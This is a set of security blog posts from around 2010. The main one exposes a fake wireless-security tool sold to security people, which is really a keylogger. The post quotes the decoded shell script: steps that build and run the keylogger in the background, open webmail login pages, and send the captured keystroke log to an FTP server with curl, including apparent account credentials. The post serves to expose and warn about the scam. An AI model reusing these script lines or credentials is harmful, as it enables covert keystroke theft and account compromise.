Now, this is nothing new, and as I stated before, has been going on for years. I’m not even going to go to the political discussion on whether this is sponsored by the government (or have been turned a blind eye by it), as opposed to Israeli hackers that would like to retaliate but know that they would be charged in their country for computer crimes.

No.

The focus here is that there was such a huge media outrage over the fact that so many (more than 100,000) user accounts have been affected, and everyone is scrambling to figure out who should have notified who on what. A couple of funny things to consider in this incident:

1. There are more than a couple of companies in Israel that specialize in gathering intelligence on such forums as their core business. One company has even been quoted that they knew of this issue months ago.
2. Some of the accounts that have been breached belong to government personnel (or at least have a .gov.il email account with it’s corresponding password).
3. The sites that have been breached were not notified until a couple of days ago. They have no-one to consult with in terms of how to handle this incident, or how to fix their issues (ever heard of one-way password hashing??? apparently not…).

Why am I bringing up these specific point? Let’s see, and now from a perspective of a normal CERT that if would have been here would have addressed these as follows:

1. Companies that deal with security research can send their insights over local security incidents to a coordinating entity – IL-CERT that would manage the anonymous and responsible notification to the affected parties. No need to figure out a local policy for notifications, no need to dig out contact details for obscure police departments and guesstimate whether they even care about your data, and no need to get into the politics of the existing semi-CERTS and who they constituency is.
2. Coordination and notification to government related bodies would  be handled through the ILGOV-CERT (although their website is not too promising, there are ways to reach them…). Additionally, collateral damage notification would also be handled in the same way (i.e. – a .gov.il site has not been breached, but .gov.il account have been found through breaching a .co.il server. This is the kind of thing that ILGOV-CERT does not know how to handle right now…).
3. Incident handling support and assistance would have been provided by subject-matter experts to any site that have experienced a breach. No cost associated (unless actual work on the servers or code would have been sought after, in which case the IL-CERT would have probably done a referral as initially it would not be a commercial body).

Simple huh? And you keep wondering how come a place where so much innovation in science, technology and security has come from is still in the dark ages of it’s own internet security…

Related posts:

1. FIRST and IL-CERT
2. Cyber[FUD]Fare – repost from fudsec.com
3. The China/Google thing, accountants and other miscreants

It did not take too long, and with the accidental help of TechCrunch (btw TechCrunch – you may want to change this link to something else after you read this…) I ran into this “Wifi Security” site.

Yes, I know, the design is horrible, the scrolling thing on the top of the page is just missing a <blink> tag to drive you into an epileptic seizure, and the music, well, it’s music as part of a website – welcome to the 80’s.

Not being deterred by the horrible design, I went ahead and downloaded the “tools” offered in the article. After all, the FBI are using this guy’s tools…
A quick look, and I was faced with three supposed shell scripts (ended with a .sh), and a tarball called “rogue.tar.gz”.
When you get a shellscript that isn’t a shellscript, and is being reported as an “ELF” executable, you should get your detective hat on, which is exactly what I did.
It didn’t take long, and the scam unfolded pretty quickly. Here’s a quick recap of what’s going on with this guy’s website:

1. The provided “tools” aren’t even security tools. Initially I figured – ok, so this guy packed a few open source wireless tools and scripted them for easy usage. No. Not even karma which the main script suggests that is being used (appropriately I might add for the purpose of what this script is SUPPOSED to do).
2. A quick look at the tarball revealed that is actually contains a keylogger that has been graciously stolen from here.
3. When the main script (karma.sh) is run, two supporting scripts (bg1.sh and bg2.sh) are launched. They are taking care of compiling the keylogger, running it, and pushing the logged keys logfile to an FTP for the attacker (I guess we can call him that now) to use at his convenience.
4. You are prompted to log into your webmail account, send a request for a free activation code with an indemnity text, which would be answered by the “automatic” processes on their end promptly so you can enter the code into the installer and start playing around with WiFi security. FTW!

Observant readers may notice that I referred to the tool as having “supposed” script files, that are actually binaries, and now I refer back to them as scripts. What gives?
Well, simply put, our attacker didn’t really take the time to code an application, he just wrote a couple of shell scripts, and in order to try to hide his malicious and ill-intent actions he “compiled” them with a utility that packs shellscripts in executable form called shc. The road from a linux executable to realizing what the script originally was is pretty short…

Now, that most of the cards are on the table, we can actually take a look at what scam this guy is running, and how he runs this. Following are some snippets from the shellscript that was presumably a wireless security tool. Even if you are not an avid Linux shellscripter, I’m sure that the annotations (true to the original) will shed some light…

# START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)
cd lkl2
./configure –silent
make –silent
make install –silent
cd
chmod +x /root/bg1.sh
nohup /root/bg1.sh &
rm -r /root/nohup.out
chmod +x /root/bg2.sh
nohup /root/bg2.sh &
sleep 2
rm -r /root/nohup.out
clear

So, we see how the keylogger is compiled, installed and the supporting scripts bg1 and bg2 are run.
Next up, is the installer itself (if one can call that) which prompts for the user to send a FREE activation request to the attacker:

# MENU LIST
echo “”
echo “——————————————————— “
echo “THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED “
echo “——————————————————— “
echo “”
echo “1. Compose indemnity text below and send to fadzilmahfodh@gmail.com”
echo “ Yes, I want activation code and will never use for illegal purpose”
echo “”
echo “2. Check your email for activation code after sending text “
echo “”
read -p “3. Send now ? (0=no, 1=yes) “ act
clear

Obviously, the message WILL appear, as this thing is NEVER going to be activated – remember – this is a shellscript, and the “menu” appears as-is unconditionally so you can try to activate this until blue in the face… but we are getting ahead of ourselves.

I mentioned in the title that the scam is targeting security people. Besides the obvious wireless security related topic, here’s another little piece of “evidence” from the script:

read -p “Which backtrack are you using ? (bt3=3,bt4=4) ” bt

Our little friend is assuming that we are using BackTrack (as most security folks do) to run their wireless tests… the script continues according to which version of BT is entered (to accommodate the differences in network configuration…).
I’ll skip through the network connectivity checks (trust me), and next up the attacker makes sure that firefox isn’t running, and:

firefox https://login.yahoo.com/ &
sleep 4
firefox https://www.google.com/accounts/ManageAccount &
sleep 4
firefox http://home.live.com/

The attacker obviously wants us to log into one of our webmail accounts so we can send him that activation request email with the indemnity text (how considerate). Keeping in mind that the keylogger is on and it’s activities are uploaded in the background to the attacker’s FTP – this is exactly where most people will fall into the trap.

And for the grand finale – the actual activation (you’d think huh?):

############################
# DECOY FOR ACTIVATION CODE
clear
echo “”
read -p “ENTER ROGUE AP ACTIVATION CODE : ” pls
sleep 3
echo “You have entered an invalid code ”
echo “”
exit
############################

You have to admit that commented code is the best! It’s actually saying “decoy”! How f*&^ing awesome is that? You get to craft your email after logging into your Yahoo!/Gmail/Live account, and then go back to this completely useless activation part. I do like the fact that the author put a “sleep 3” before letting you know that you entered the wrong code. As if it was hard at work verifying it. Classic.

That’s about it for the technical analysis, but it wouldn’t be complete without the actual interaction with the attacker, wouldn’t it? Let’s see – so, we crafted a “request for free activation” email with the indemnity text in it, and guess what – we got a reply!

Hi

1. We are preparing the activation code for you.

2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c fadzilmahfodh@yahoo.com ?

Cheers.

EMAIL VIA MY CELLPHONE FOR FAST RESPONSE
http://fadzilmahfodh.blogspot.com

So not only there is no activation code to be “prepared” for me (what? I’m going to feed it to the “decoy” and it’ll magically work?), we are being prompted to donate some cash for the poor bastard who worked so hard to make this tool for the community…
I cordially answered that:

1. Thanks. I’ll be looking forward for the activation code.

2. I’ll probably consider it after being able to test out the tool.

Which was replied with a suggestion to try the trial version on his site (which relates to a completely different tool, but let’s not be too picky about it…).
Now, thankfully, I was using one of my throw-away yahoo accounts, and apparently so our attacker. If you haven’t noticed, one of the cool things in the new Yahoo! webmail is that you get an indication whether the person emailing you is online or not, and you can chat with them!
Guess what happens next…

—– Our chat on Wed, 7/7/10 2:53 PM —–
Iftach(2:34 PM):  hey man
Iftach(2:34 PM):  mind if a ask a couple of questions?
fadzilmahfodh(2:34 PM):  okey
Iftach(2:35 PM):  cool. I’m doing this research on security tools and their
authors…
fadzilmahfodh(2:35 PM):  okey
Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write
it, how well is it distributed in the community etc…
Iftach(2:36 PM):  does that activation thing a common practice with free tools?
fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need
supporter
fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for
code
Iftach(2:37 PM):  I see.
fadzilmahfodh(2:37 PM):  i no longer able to provide for free
fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my
time and effort
fadzilmahfodh(2:38 PM):  hope you understand

Time and effort? Right… For a scam script that doesn’t even have any networking functionality… Ok, I’ll go along…

Iftach(2:40 PM):  now, about the tool – that’s a linux binary obviously (thought
it was a shell script at the beginning). Did you base it on something existing
or write yourself?
fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code
Iftach(2:41 PM):  hence the activation i see…
fadzilmahfodh(2:42 PM):  i can afford to give ‘free lunch’ to everybody. Hope
you understand
Iftach(2:43 PM):  sure, i understand.
fadzilmahfodh(2:43 PM):  So you interested in the software?
Iftach(2:44 PM):  more from a research point of view – for an article I’m
writing
Iftach(2:44 PM):  so, the installer you use, I see that it contains some
additional code that is being compiled on the client.
fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user
hardware
Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that
to verify that the client is a registered one?
fadzilmahfodh(2:46 PM):  Well, that is another story…
Iftach(2:46 PM):  I’m listening
fadzilmahfodh(2:46 PM):  maybe some other time huh
Iftach(2:47 PM):  OK. Last question – do you get a lot of account passwords
through that keylogger that sends the data to your FTP?
fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court

At this point of my “interview” with him, I guess that my cover was going to get pretty real, hence this “article” that you are reading… You can’t make this stuff up so I figured I’ll blog it…

Iftach(2:48 PM):  aha, and it’s part of the installer because? just to make sure
people can send the activation email correctly?
Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for
activation – how many passwords do you manage to grab?
fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with
data in server
fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run
fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the
server
fadzilmahfodh(2:49 PM):  then everything will not run
Iftach(2:49 PM):  and how does that relate to the keylogging?
fadzilmahfodh(2:50 PM):  well, that i another story…
Iftach(2:51 PM):  I mean – the keylogger data is sent to that FTP. Is that part
of the verification or is this a separate process?
Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that
FTP server per day?
fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the
hell am i going to tell you
Iftach(2:52 PM):  Let’s just get it straight – I’m not going to “support” the
site… I’m just doing some research on security tools.
fadzilmahfodh(2:52 PM):  bye
Iftach(2:53 PM):  You are free to tell, or not if you don’t want to. But I’m
publishing the story as it is…
Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your
site visitor passwords. Unless you want to be quoted otherwise in the story…

True to my chat with Fadzil (or whatever his name is), I’m telling it the way it is.

But wait, there’s more!!! more? how come? well, just to put some icing on this, I went back and decoded the script that was in charge of the FTP upload…

curl -s -k –ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt

Just to see the final lameness come to life as I tested the account:

And you know what – it’s all our fault! If we as a community would have “donated” to this guy for all his hard work and effort that he’s been putting in creating tools that are used by the FBI (check out his site…), he would have had the money to keep his driveHQ account in order and could make a decent living out of ripping people off.

Seriously.

p.s. you can find me talking about this entertaining even on the ISDPodcast with my buddy Rick, I just had to vent off before putting this in writing, so hopefully this account is a bit more thorough and to your liking…

Update 7/13/2010: I could not have wished for better response from the community on this post, but having the actual culprit respond here is priceless. As you can probably see, Fadzil has posted a comment, and to sum things up let me just state that I’m not that surprised by its content (I think it’s called “pulling a ligatt” these days…). On one hand he offhandedly dismisses that there was ever such an issue with a keylogger, on the other hand he promises a better version with (and I’m quoting): “rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password”.

You don’t say?! I’m still waiting for the security practitioner that will explain to me why would anyone need a keylogger + ftp to use a rogue AP with fake login pages. I’m really hoping that this post helps the community learn more on criminals such as the one we are dealing with here. Don’t be tempted to “smooth-talk” that tries to look technical and hackerish while having nothing behind it. And if you have had any additional experiences with this guy feel free to add them to the comments or email me so I’ll update this story for everyone’s benefit.

Related posts:

1. Credit cards on a clearance sale and your internet security
2. Tying up loose ends before Vegas (scammer closure)
3. The Turkish hack and another case for IL-CERT

The question is usually presented by someone who’s in charge of “Security” in an organization. Now, I wouldn’t have had a problem with this if this was a technician, or a pen-tester of sorts, but I get really nervous when the CISO/CIO/Security manager is the one asking.

I think that this question is highly inappropriate for two reasons:

1. You should not be looking for “technology”. Buying a product is not going to make you more secure or less secure.
2. You should not be trying to protect a technology. Your servers, networks, routers, PCs, etc… are not the focus of information security. The information is…

Having been working with senior management – sometimes as an advisor/consultant, and sometimes as a “virtual CISO”, I know that this is not what we expect the CISO or security manager to ask. We expect business savvy, we expect an understanding of what the information assets are, what are the information critical paths, who owns the information and what is the impact of every asset on the business. We expect that the understanding of how each assets fits into the grand scheme of things would be clear to whoever is in charge of securing it, and we expect them to take into account what is the potential damage related to each of these assets (in terms of losing it, having it fall into the wrong hands, etc…).
For me (or us when talking as management) this is the only way to approach security. Funny how things get a little unclear when all you thought you needed to know was which vendor/product fits where in your topology, huh?

What strikes me as most peculiar is the fact that a lot of these security “professionals” find themselves in a self proclaimed identity crisis, having to deal with business requirements and financial understanding of how the business operates. and the weirdest thing is that they often choose to get back to what then “know” best – the technology side of things. Definitely not the way to make a move…

I’m really hoping that all this preaching of “know thyself before you know your enemy” would help somehow, because right now unfortunately the situation at hand only brings us more business (not that I’m complaining). But seriously now – technology is fine and cool, but having the aptitude to know where it fits, not on an architectural level, but from a business perspective is the key to what we do. Get back to the drawing board, erase the network topology and start drawing the business one!

Related posts:

1. Practical vs. Regulatory – the votes are in!
2. Who owns your online identity? Facebook squatters on the rise
3. Being in the middle (or: things we didn’t manage to learn in a decade)

I’ve been intravenously fed with FUD for as long as I’ve been in the business.

The main strategy for understanding that you are facing FUD is to realize that there is a financial motivation behind the FUD-spreading entity. This has served me well over the years and managed to keep me out of trouble (i.e. buying/selling/liking any “you gotta have this!!!” technology).

I have to admit that when I started seeing what the media is doing to the term CyberWar, I was a bit baffled. What’s the motivation? It’s not like we can run to the local RadioShack and buy an Anti-CyberWar overpriced box of solutions for just $39.99 (not including annual license renewal of $99.99).

Nevertheless, as someone who likes security (yeah, I know… sorry…) and actually spends most of his time playing around with computers (my semi-formal job definition), I had to dig into this.
I decided to start off with my prior knowledge of CyberCrime (again – definitions aside, some say eCrime, some CyberCrime, some tomato…) to cover the more “traditional” attack vectors and risk surfaces. Armed with these, I wore my thinking hat and ventured back in history to re-inspect some of the cyberwar incidents of our past. The main incidents that brought the most media attention were the Estonia and the Georgia ones.
Estonia being dubbed the “first true cyberwar” in some publications (and by some “professionals”) turned out to be mostly civilian  – meaning that there didn’t seem to be a Kremlin general high on Vodka that marched his army of hackers into cyberspace to crush the Estonia internet!!! On the other hand, reality seemed much more familiar that expected – a couple of defacements from skiddies on the hacktivism side, and a fairly traditional DDoS using a botnet that – behold – is attributed to CyberCrime. Almost like someone was trying to push me back to my “place”.
To be completely honest, there was a bit more to it. For anyone who is familiar with the RBN, you probably are aware of the close ties it has with Russian authorities that allow it to operate almost uninterrupted. The timing of the attacks, and the scale of it indicate that either some hacktivists got a huge favor from a highly commercially inclined organization, or that some kind of quid-pro-quo between RBN and a Kremlin rep was in place to put a little pressure on the Estonia neighbors.
But from some greased hands that allow RBN to keep running aloof to “the first true cyberwar” is a long haul…

The second example was the Georgia-Russia front. While getting somewhat less attention in the media, this was more closely a “CyberWar”, or an act of cyberwarfare, as it has been closely coordinated with kinetic actions taken on the ground by the Russian forces. Nevertheless, the same deniability factor plays well here – use of botnets operated mainly by CyberCriminal groups was the main attack surface.

Interestingly enough – true cyberwar acts failed to truly make a media hit (look for the alleged bombing of the alleged nuclear plant in Syria by alleged Israeli F-16s… These allegedly did not show up on any radar screen. Not in Turkey, nor in Syria or Lebanon. Go figure ).

But the real cherry on top has been APT! When I first heard that there was an APT and it was very malicious and scary I thought that there goes my favorite Linux distribution… Yeah – I’m such a sucker for the media
Too bad that the latest APT (and that’s the last time you’ll see this acronym here) is just another FUD-happy name for – wait for it – TROJANS!!! Trojans, and rootkits, and keyloggers and viruses!!! run for your lives…
Seriously now. Whether state sponsored (possible…) or just another highly targeted criminal attack on select organizations (seen it before, handling some on a daily basis, not calling it funny names…), we go back again to the FUD motivation.
According to the latest one (FUD that is), CyberWar is full of APT (broke my promise. deal with it), and it can only be protected by – you guessed it – AntiVirus! (or whatever new fancy names our beloved vendors find for the same software they have been pushing us in the last 20 years).

So cheer up!  The sky is not falling. It’s just a little cloudy, and the usual bad people are still around doing their thing. The only difference is that you need to realize that ANYONE can hire these bad guys. Yes – even your government (or whatever shell company used to disguise it). Just like we are used to do with more conventional arms dealing.

Hope this was some food for thought. For more on the topic you can check out my past coverage of Cybercrime (BlackHat, DefCon, HackerHalted, Excaliburcon, etc.) and the up-and-coming coverage of Cyber[Crime|War] connections in BlackHat EU and the FIRST conference.

Related posts:

1. New post on fudsec.com – CyberFUDfare
2. CyberCrime, CyberWarfare, and 2010
3. Cyber[Crime|War] – connecting the dots – BlackHat EU 2010

I’m not putting any links to BeeFence since it was a startup I had the honor to be one of the founders of (which obviously went down the road of many other startups…), but the neat thing about it was the technology (did I mention I was the CTO ). Basically – we had what we called “Active Validation” (or sometimes “Interrogation”) of sessions. We generalized it a bit more to cover additional protocols rather than just focus on Web2.0 (think what it can do to the NIDS/IPS world…).

Makes me think of getting back on the startup bandwagon, although I’d have to make some sense out of the drawer-full of ideas I’ve been filling over the past few years having been engaged in web security and cloud security recently… you never know

Related posts:

1. Two steps forward, one step back – controling botnets…
2. Identity crisis
3. Clouds, and the winds that blows them away…

First things first – the main reason for abstaining from the cloud security discussion was simply the lack of definition (and existence) of clouds… True – Amazon has provided the infrastructure to the first layers of building cloud solutions, but full-on “process-as-a-service” has yet to emerge from the different offerings that call themselves cloud. There has been enough ink (bits?) spilled over what really is  cloud computing and what it isn’t (you can check out Craig’s presentation, and Hoff’s view on things).

And now to my 2c on the subject at hand, I have been involved with a few cloud security companies in the past months and being able to lend a hand at the strategic level, I was exposed to several aspects of where are we now with cloud computing, where are the gaps that security firms will need to pitch in and provide basic protections, and a whole lot of marketing fuzz that needed to be thrown off in order to realize what’s out there.

To begin with, we had to sift through the marketing mambo-jumbo to get to the point – seems like the more expensive your marketing budget is, the farther away you get from reality in your message – too bad (and that’s coming from someone who turned a lot of technical material into marketing…). Hence the first point – blowing enough smoke to make everyone tear does not constitute for creating a cloud.

Point two – now that we to the bottom of the offering (and I’m not going to name names…), one usually realizes that it has either been out there for quite a while and has been wrapped in clouds to sell it better, or that someone has made some basic adaptations to an existing offering (see roaming users, VPN, scanning services) to cloudify it. Whatever is left that did not fit into the previous schemes is worth a second (or is it third by now) look.

Point three – what’s the market for your cloud offering? The last hurdle that all these new cloud companies face is choosing (or defining) a direction. Do you see yourself providing a solution for the end users? for businesses? for the cloud infrastructure providers? for providers of services/software/processes on the cloud? If you get an answer in the lines of “we basically provide a solution for all of them” – run! As each of the mentioned markets have different needs, and different views on their place in the cloud, you better get a solid answer for this. I strongly suggest reading the “Cloud Architecture” section written by Chris Hoff which is part of the Cloud Security Alliance’s “Guidance for Critical Areas of Focus” starting at page 15 in order to get an idea on the latter.

Now with most of the fluff away, and the offering at hand we can actually focus on whether it makes sense (business-wise), and where does security fit in. By no means this is going to be a guide for securing the cloud, but always remember the architectural model – from hypervisor, all the way through multi-tenanting, data abstraction and sharing, inter and outer process communication, and off to simple abuses of the cloud in the form of DDoS, Botnet tools, etc…

Hope this made some sense – if not I can only suggest reading some more material on it, and to play around with the current offerings from Amazon, Azure (MS), and Ubuntu (Canonical).

Related posts:

1. AHA! A blast from the past…
2. Being in the middle (or: things we didn’t manage to learn in a decade)
3. Cyberwarfare and Cybercrime – more links turn out in study

When I spoke at DefCon last month it was a great opportunity to catch up with some of the leaders in the study of cyberwarfare and cybercrime, and as always the discussions were really eye opening as we all had a chance to “compare notes” and fill in some pieces of the puzzle where crime turns into warfare and vice-versa. Following DefCon and BlackHat with almost perfect timing, the US-CCU (United States Cyber Consequence Unit) has published a research which again alludes to the links between cyberwarfare and the involvement of cybercrime. The study talks about the fact that companies and individuals may be targeted as part of a campaign, and may also be part of the attack when looking at things from the other side.

What’s important to remember is that some of the research relied on studying the last Russia-Georgia conflict in which attacks were also launched using commercial botnets – a fact that may skew the stats a bit and throw innocent individuals and companies into the same pool as premeditated attackers, just because their systems were infected and part of the botnet.

Just a quick word of advice – always remember to look at the whole picture when reading such studies, as even the most professional research may focus on specific aspects of the subject in matter and might skew the conclusions (as implicit or explicit as they may be) as a result.

Related posts:

1. CyberCrime, CyberWarfare, and 2010
2. Cyber[FUD]Fare – repost from fudsec.com
3. It’s all about the money

The basic realm of what we are all doing on a daily basis (at least the ones that deal with information security and risk management) is trying to make sure that we keep our information intact, comply with the relevant regulation for our industry, and have it all done within a budget. Nevertheless, often one can see one of two approaches being applied in the field – the practical one, and the regulatory one. The more practical approach looks for the relevant risks and tries to control them and minimize their exposure to relevant threats. The regulatory one state that we’ll pick the “best practice” solutions that would have us comply with the regulation, and by doing so we should be OK as the rest of the world pretty much does the same.

Unfortunately, the practical approach that fuels logical thinking, understanding your assets, risks, threats and resources available, and tries to constantly adapt your security measures to them is rarely adopted, and I have only seen a few select organizations “make the plunge” into the thinking zone. It is more often that one would find an organization that has hired consultants to perform risk assessment and gap analysis (which is a basic part of most regulatory requirements these days), and then have them use whatever budget available for the certification to install security products (again – best practices…) which would cover all the “high” risks found in the risk assessment, and some of the “medium” ones.

I truly think that the gap between the practical approach and the regulatory one is not that big (guess which one I endorse…). The root cause for what brought most of the commercial and financial organizations to adopt the regulatory approach has been the crackdown of governments and regulatory body post Enron/WorldCom/the credit crisis/[add your financial/corporate crisis here] on companies worldwide, and the immediate proliferation of information security “professionals” that were merely technicians or integration engineers with a fancy title. Budgets were allocated, products were evaluated, and with the endorsement of a savvy accounting firm you could find yourself compliant in no time with a brand new lineup of “best practice” products in your network.

Taking a step back, and actually looking at the regulatory requirement (interesting homework for you – take a look at your “favorite” one and try to look at it in as an objective view as possible), it’s clear that most regulations can be adhered to without just hopping on the vendor product bandwagon. A careful assessment (as noted – part of any basic compliance project) can map out the actual assets that YOU need to protect (which are obviously different than someone else’s assets – hence the regulation can’t over them all specifically), and provide you with the scale to measure how much capital would be WISELY spent on protecting the said asset. I promise you, that after going through this drill, you’ll find that the money that is needed to really protect your information and mitigate the risks relevant to your organization, is less than what you would have spent on “best practice” solutions that provide mediocre protection for some general phantom assets which the regulator pointed to.

The final step in keeping this process in the “practical” land and preventing the regulatory approach to pop up on the next time the certification date looms is to keep running those numbers – what is my risk, what are the ACTUAL threats I’m facing, how do my current measures stand against the threats, and how have my asset valuation changed. By keeping this measurement practice up-to-date, you can easily (and again – cost effectively) adjust the protections appropriately, stay compliant (and not just for the first month after certification), and see an actual benefit out of all the budgets spent on information security and risk management.

To quickly sum up, I’ll include an excert from a post by valsmith that I highly concur with:

Many companies have not yet developed the ability to identify, document or even discuss the real risks to their business and are barely holding on by figuring out whatever regulations they need to follow and checking off the boxes. They need to pass. Shinking budgets mean they need it cheap. This means that pen testers are selling something with little real world, but lots of bureaucratic, value.

Related posts:

1. Identity crisis
2. Drawing the line – securing an organization while thinking of users…
3. Being in the middle (or: things we didn’t manage to learn in a decade)

Fortunately, we keep getting great feedback from the community since we started the publication, and were able to correctly predict and analyze way in advance every major trend in the field. From dynamic code obfuscation, advertising as an attack vector, affiliation networks for distributing code, crimeware toolkits, evasive techniques in malicious code writing, and the latest crimeware Trojans, and widgets and gadget insecurity.

We were always able to step back and see how what we have been analyzing in the last couple of months is becoming the new pet-peeve of the web security community and its surrounding media coverage. So once again, thank you Symantec, IBM and everyone else who have acknowledged our latest research, and we’ll be looking forward to the next quarter…

Related posts:

1. Widgets+Advertisements=?
2. The impact of just 5 random letters…
3. Google’s “Ghost in a Browser”, WebSense, and more…